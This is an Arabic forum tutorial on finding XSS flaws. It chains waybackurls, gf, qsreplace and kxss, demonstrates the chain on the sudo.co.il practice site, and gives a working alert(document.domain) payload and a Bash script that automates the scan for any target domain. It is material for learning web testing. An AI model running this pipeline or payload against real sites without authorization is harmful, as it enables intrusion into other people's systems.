x32x01
  • بواسطة x32x01 ||
شرح أكتشاف ثغرات XSS فى الموقع + الأدوات اللازمة
باستخدام مجموعة أدوات [waybackurls - gf - qsreplace - kxss] :

شرح الادوات :
1. تقوم اداة waybackurls بجمع كل العناوين URLs الخاصة بالموقع مع كل المجالات الفرعية :
2. تقوم اداة sort -u بفلترة العناوين المكررة
3. تقوم اداة gf xss بفلترة العناوين مع الباراميتر التي تقبل المدخلات مثل
Code:
[https://target.com?name=test]
4. تقوم اداة tee -a باخراج النتائج في ملف
5. تقوم اداة qsreplace باستبدال قيمة الباراميتر بقيمة FUZZ
6. تقوم اداة kxss بفحص كل الباراميتر واستبدال كلمة FUZZ بمجموعة مدخلات مثل [ "><' ] للتحقق من ثغرة XSS و HTML Injection
7. امر pipe (|) لإعادة توجيه المخرجات والنتائج من برنامج إلى آخر

تنزيل الادوات باتباع الخطوات التالية بالترتيب :
Code:
> sudo apt install golang-go
> go get github.com/tomnomnom/waybackurls
> go get -u github.com/tomnomnom/gf
> cd ~/
> git clone https://github.com/1ndianl33t/Gf-Patterns
> mkdir .gf
> mv ~/Gf-Patterns/*.json ~/.gf
> rm -rf ~/Gf-Patterns/
> go get -u github.com/tomnomnom/qsreplace
> go get github.com/Emoe/kxss

لتستطيع تشغيل الادوات من الترمنال مباشرة قم بنقل الاداوت الى المسار التالي :
Code:
> cd ~/go/bin/
> sudo cp waybackurls gf qsreplace kxss /usr/bin

الان سنقوم بفحص موقع http://sudo.co.il/xss الخاص بالتدرب على اكتشاف ثغرات XSS :
all-xss.png
استخدام اداة waybackurls مع اسم الموقع فقط بدون https :
Code:
> waybackurls sudo.co.il/xss | sort -u >> waybackdata.txt
> cat waybackdata.txt | gf xss | tee -a xss1.txt | qsreplace FUZZ >> xss2.txt
> cat xss2.txt | kxss |tee kxss.txt
xss.png
كل URLs التي تم عرضها لاتقوم بفلترة المدخلات [" < > $ | ( ) ` : ; { }] :
Code:
 http://sudo.co.il:80/xss/level5-1.php?p=FUZZ"><
sudo-xss-1.png

Source Code
sudo-xss-2.png
البايلود المناسب لتنفيذ سكربت في الموقع المصاب :
Code:
';alert(document.domain);'
http://sudo.co.il:80/xss/level5-1.php?p=FUZZ';alert(document.domain);'
sudo-xss-3.png
سنقوم بانشاء سكربت بلغة Bash لأتمتة كل الاوامر السابقة في امر واحد :
Bash Script : script.sh
========================
Code:
#!/bin/bash
waybackurls $1 | sort -u >> waybackdata.txt
cat waybackdata.txt | gf xss | tee -a xss1.txt | qsreplace FUZZ >> xss2.txt
cat xss2.txt | kxss |tee kxss.txt
=========================
نقوم باعطاء السكربت صلاحيات التنفيذ
Code:
 sudo chmod +x script.sh

تنفيذ السكربت مع اسم الموقع فقط بدون https
Example :
Code:
./script.sh target.com
./script.sh sudo.co.il:80/xss
script-sh.png
 

المشاركات المتشابهة

x32x01
الردود
0
المشاهدات
80
x32x01
x32x01
x32x01
الردود
0
المشاهدات
124
x32x01
x32x01
x32x01
الردود
0
المشاهدات
79
x32x01
x32x01
x32x01
الردود
0
المشاهدات
16
x32x01
x32x01
x32x01
  • x32x01
الردود
0
المشاهدات
41
x32x01
x32x01
الوسوم : الوسوم
xss ثغرة xss

الدخول أو التسجيل السريع

نسيت كلمة مرورك؟

آخر المشاركات

أحدث المنتجات

إحصائيات المنتدى

المواضيع
1,624
المشاركات
1,812
أعضاء أكتب كود
230
أخر عضو
Mostafa Alaa
عودة
أعلى